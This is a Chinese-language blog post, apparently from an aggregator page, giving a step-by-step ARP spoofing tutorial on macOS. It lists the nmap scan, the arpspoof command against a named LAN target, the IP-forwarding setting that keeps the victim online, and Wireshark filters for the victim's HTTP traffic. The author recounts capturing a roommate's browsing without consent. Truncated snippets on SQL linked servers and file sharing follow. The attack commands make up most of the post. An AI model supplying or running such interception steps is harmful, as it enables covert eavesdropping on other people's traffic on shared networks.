arp(address resolution protocol,位址解析協議)是獲取實體地址的乙個tcp/ip協議。傳送方用目標ip位址去換取了接收方的mac位址,之後mac位址存放到本地的快取中(在一定的生存期時間內)。
而arp欺騙就是:機器a的mac位址告訴目標機b(目標機b在任意時候都可以接收arp請求的應答),讓目標機b 以為本機才是閘道器,這樣b接收後就會更新本地快取,以後所有本該走到閘道器去的包都會從機器a走,這樣機器a就可以獲取b的資料報了
假設c為閘道器,a為欺騙者,b為被欺騙者,之前是 b->c,而欺騙之後,b->a->c,如果a不進行資料**的話,那麼b就像是斷網一樣
安裝完畢之後在命令列上輸入port
進行測試
port
如果說找不到指令,則在命令列或者bash_profile或bashrc中輸入以下內容將其加入到系統路徑中來
export path=/opt/local/bin:/opt/local/sbin:$path
之後安裝arpspoof
和nmap
sudo port selfupdate
sudo port install nmap
# 以下兩條命令二選一,arpspoof都包含在內
sudo port install dsniff-devel
sudo port install dsniff
最後如果出現提示叫你執行以下類似命令的話請無視
port
select
--set python python27
執行命令進行測試
nmap -v
arpspoof
需要獲取以下資料 執行
sudo nmap -ss 192.168.1.0/24
等一會兒會得到型別下面結果
第乙個192.168.1.1是閘道器位址,最後乙個192.168.1.101是我本機的ip,而從第二個開始就是接入本區域網的其它機器的ip,就用第乙個吧
arpspoof -i en0 -t 192.168.1.100
192.168.1.1
# 開啟ip**,否則的話對方機器會出現斷網的情況,關閉的話把1改為0
sudo sysctl -w net.inet.ip.forwarding=1
開始wireshark開始抓包,把filter設定為ip.addr == 192.168.1.100
如果只想抓http的話就這樣寫ip.addr == 192.168.1.100 && http
當時比較震驚的是抓到了室友看黃圖的鏈結…
對我的華為榮耀7進行arp欺騙時失敗了,貌似是它有防護措施,多試了幾次發現只有在其剛接入區域網的時候才能欺騙成功,但是想再次進行欺騙也沒成功,對別的ip進行欺騙時也是失敗次數多於成功的
目前https越來越流行,這意味著即使你抓到包了也不知道資料是什麼,它在tcp之上新增了一層ssl,搜了一下破解的方法也只是定向的,泛用型不好,不過這樣更安全也不錯
同一區域網內跨庫訪問資料進行操作
1.新增鏈結伺服器 exec sp addlinkedserver server test 被訪問的伺服器別名,自己可以隨意取名 srvproduct provider sqloledb datasrc 192.168.71.35 要訪問的伺服器的ip位址 2.新增鏈結使用者名稱和密碼 exec s...
同一區域網內不同網段檔案共享設定
假設你的電腦ip是那個10.16.16.115,對方電腦ip是10.16.17.56。這樣做 進入你的電腦的本地連線,屬性,ipv4位址協議,雙擊進入,不要自動獲取ip,點一下另乙個,使用下面的ip位址 然後,最下面的 高階 按鈕,進入後,手動新增ip位址,點選 新增 先寫入你自己的網段ip,10....
共享資料夾設定,在同一區域網內連線
1 兩台電腦都連上同乙個路由器。2 右擊桌面建立問價夾並命名,最好是英文 我命名為test 2.1右鍵資料夾,找到屬性,並開啟,找到共享 網路和共享中心 3 選擇 公共網路 選擇以下選項 啟動網路發現 啟動檔案和印表機共享 啟用共享以便可以訪問網路的使用者可以讀取和寫入公用資料夾中的檔案 可以不選 ...